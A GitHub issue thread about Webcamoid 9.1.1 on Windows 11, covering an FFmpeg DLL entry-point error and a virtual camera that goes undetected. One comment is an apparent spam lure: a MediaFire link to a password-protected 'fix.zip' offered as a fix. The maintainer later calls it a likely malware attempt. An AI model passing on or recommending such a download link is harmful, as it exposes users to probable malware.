webcamoid/webcamoid #710: Procedure entry point "avpriv_fopen_utf8" could not be lcoated in DLL "C:\Program Files\Webcamoid\bin\avcodec-60.dll"

fflo92, 2024-08-26:
# Reporting a problem?

## Summary

## Current Behavior

I've bought, downloaded and installed webcamoid from the website. Once I click on run I get two windows error messages, which are thrown multiple times. I click on "Ok" all the time, afterwards webcamoid opens, but It doesn't show the webcam picture.

## Expected Behavior

I've bought, downloaded and installed webcamoid from the website. Once I click on run webcamoid opens, and shows the webcam picture (on my other PC it works this way).

## Steps to Reproduce

## Suggestions and tips

## Your Environment

* Webcamoid information: v 9.1.1 uses Qt 5.15.10 commit 7eec802 [https://github.com/webcamoid/webcamoid/commit/7eec80270286262290b59ed8dd8e021fdf0ef6b9](url)
* Operating System information: Windows 11 Pro; 10.0.22631 Build 22631; x64
* Any other useful information: (logs, gdb backtrace, valgrind logs, screenshots, hardware, etc.)

[image]
[image]

# Want a new feature?

# Questions and other matters?

NhutDang2002, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

fflo92, 2024-08-26:
i can't find the comment with fix download anymore

fflo92, 2024-08-26:
also, when i install virtual camera and it asks me to reboot, the installed virtual camera doesnt show up and it asks me to install again, which fails cause its already installed but not recoginzed by software

fflo92, 2024-09-02:
> Sorry for answering late.
> 
> > i can't find the comment with fix download anymore
> 
> Absolutely **NEVER** download anything from any other user that is not ME or from the official websites, the user was probably a spammer and he probably tried to make you download malware.
> 
> > Procedure entry point "avpriv_fopen_utf8" could not be lcoated in DLL "C:\Program Files\Webcamoid\bin\avcodec-60.dll"
> 
> This is weird, the binaries were never modified since released, and FFmpeg related binaries were the one provided by MSYS2 and did tested lately and it worked fine. If you go to Preferences/General Options, does **video record** have FFmpeg selected?
> 

Yes
> > also, when i install virtual camera and it asks me to reboot
> 
> It ask you to restart Webcamoid not the whole system, anyways it does not make any difference.
> 
Thats what I meant, sorry if unclear
> > the installed virtual camera doesnt show up and it asks me to install again, which fails cause its already installed but not recoginzed by software
> 
> ![Outputs](https://private-user-images.githubusercontent.com/1249885/361590203-c93b4883-5861-49f5-8972-039643e2777d.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjUyNzk2NzUsIm5iZiI6MTcyNTI3OTM3NSwicGF0aCI6Ii8xMjQ5ODg1LzM2MTU5MDIwMy1jOTNiNDg4My01ODYxLTQ5ZjUtODk3Mi0wMzk2NDNlMjc3N2QucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDkwMiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA5MDJUMTIxNjE1WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9NTI3NmM1MTQ1NGNiZTIxOWQ3ZDI2YzljNTkzZjQwYmUxYTExNDFkYjFmZGZlMzczNjQ2YTA5N2VjNGJiMThlZiZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.HksBw-xfN5M4l0bbSsTIUQcEssi7KjPg8NfP3bICr2Q)
> 
> Once the virtual camera is installed, all these options must appears in the video outputs panel, then click in "Add output".

Unclear from my side I guess. I install virtual camera and afterwards it asks me to restart webcamoid. But after restart it shows the initial screen again, asking me to install virtual camera again, although it was succesfully installed:
[image]
[image]
[image]
[image]

hipersayanX, 2025-07-29:
This issue should have been fixed in Webcamoid 9.3.0.

closed 2025-07-29 by hipersayanX